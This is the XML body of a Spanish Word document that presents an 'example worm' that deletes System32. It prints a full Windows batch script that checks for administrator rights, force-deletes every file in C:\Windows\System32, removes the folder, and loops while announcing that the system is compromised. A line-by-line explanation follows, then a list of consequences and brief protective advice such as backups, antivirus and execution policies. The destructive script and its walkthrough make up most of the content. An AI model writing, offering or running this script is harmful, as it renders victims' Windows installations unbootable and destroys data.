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27E7" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t>Ejemplo de gusano que borra system32:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>@echo off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5BC958" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t>REM Desactivar mensajes de confirmación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78481BB1" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t>echo Advertencia: Este script es altamente destructivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B56A2" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t>pause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281725BF" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E"/>
    <w:p w14:paraId="1B0FE044" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t>REM Intentar obtener permisos de administrador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1B4172" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;&amp;1 "%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%\system32\cacls.exe" "%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%\system32\config\system"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA7F1A" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if '%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>errorlevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%' NEQ '0' (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADAF1F1" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>echo Este script necesita ejecutarse como administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80A12A" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t xml:space="preserve">    pause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB3906A" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5CB80946" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B48A94F" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E"/>
    <w:p w14:paraId="4D93FE3C" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t>REM Borrar archivos de la carpeta System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418D2906" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>del /f /s /q C:\Windows\System32\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F6BB43A" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41EE083C" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t>REM Eliminar la propia carpeta System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BEC69A" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rmdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /s /q C:\Windows\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5F5DC" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3345D2B0" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t>REM Crear un bucle infinito para bloquear el sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B074A5" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="44779517" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:t>echo El sistema ha sido comprometido...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9F6135" w14:textId="77777777" w:rsidR="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /t 3 &gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="791346F8" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>goto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loop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73102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación del script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73967FA4" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obtención de permisos de administrador</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FABB7FA" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:lastRenderedPageBreak/>
        <w:t>Utiliza cacls.exe para verificar si el script tiene privilegios suficientes. Si no los tiene, se detiene.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BDE656" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Borrado de los archivos de System32</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753A3619" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:t>La línea del /f /s /q C:\Windows\System32\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0073102E">
        <w:t>*.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0073102E">
        <w:t xml:space="preserve"> fuerza (/f) el borrado de todos los archivos dentro de System32, incluyendo subcarpetas (/s), sin confirmación (/q).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553A5A83" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eliminación de la carpeta System32</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF3020" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0073102E">
        <w:t>rmdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0073102E">
        <w:t xml:space="preserve"> /s /q C:\Windows\System32 elimina la carpeta vacía (si el borrado de los archivos fue exitoso).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD621F9" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bucle infinito</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE2524E" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:t>El script entra en un bucle infinito que muestra un mensaje y bloquea el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677C561F" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r w:rsidRPr="0073102E">
        <w:pict w14:anchorId="0D1B9F75">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2800D0A9" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consecuencias de borrar System32:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42519E5D" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fallo crítico del sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>: Sin System32, el sistema operativo no puede cargar los servicios básicos necesarios para su funcionamiento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50352DC0" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Imposibilidad de reiniciar Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>: El sistema operativo probablemente mostrará errores críticos al intentar arrancar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23290208" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reinstalación obligatoria</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>: Para recuperar el sistema, será necesario reinstalar completamente Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773FBA3B" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r w:rsidRPr="0073102E">
        <w:pict w14:anchorId="77C0F995">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D854A7" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Cómo protegerse de un gusano destructivo?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2034882D" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Restringir permisos de ejecución</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A58E358" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:t>Configura políticas de seguridad que eviten la ejecución de scripts .bat o .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0073102E">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0073102E">
        <w:t xml:space="preserve"> no autorizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1654E6" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Antivirus actualizado</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C3E2A7" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:t>Los antivirus modernos son capaces de detectar y bloquear scripts maliciosos que intenten borrar carpetas críticas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DB1E79" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Control de acceso</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182CE0E6" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:t>Asegúrate de que solo usuarios autorizados tengan privilegios de administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBCA256" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deshabilitar ejecución automática de scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAC7B5C" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:t>En entornos de red, configura políticas de grupo para evitar la ejecución automática de scripts desde dispositivos externos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63054226" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Realizar copias de seguridad</w:t>
      </w:r>
      <w:r w:rsidRPr="0073102E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC7A1D1" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073102E">
        <w:lastRenderedPageBreak/>
        <w:t>Mantén respaldos periódicos de los datos importantes y asegúrate de incluir una copia del sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1497ABFD" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r w:rsidRPr="0073102E">
        <w:pict w14:anchorId="4133BE2B">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ADD351" w14:textId="77777777" w:rsidR="0073102E" w:rsidRPr="0073102E" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r w:rsidRPr="0073102E">
        <w:t>Si el sistema ya ha sido comprometido y System32 ha sido eliminado, la única solución sería reinstalar Windows utilizando un medio de recuperación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDBCB6F" w14:textId="22CD0B0B" w:rsidR="00AE52F8" w:rsidRDefault="0073102E" w:rsidP="0073102E">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p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0070"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F9D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B1B89"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27F4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34580"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C96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018421">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="986932812">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="206289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2E"/>
    <w:rsid w:val="001D56F0"/>
    <w:rsid w:val="0073102E"/>
    <w:rsid w:val="00812898"/>
    <w:rsid w:val="00A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280C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{01D33836-7D8B-45B7-8FBC-182D0E3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0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0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0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0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0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0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0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0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0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0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2025-01-23T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-23T17:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>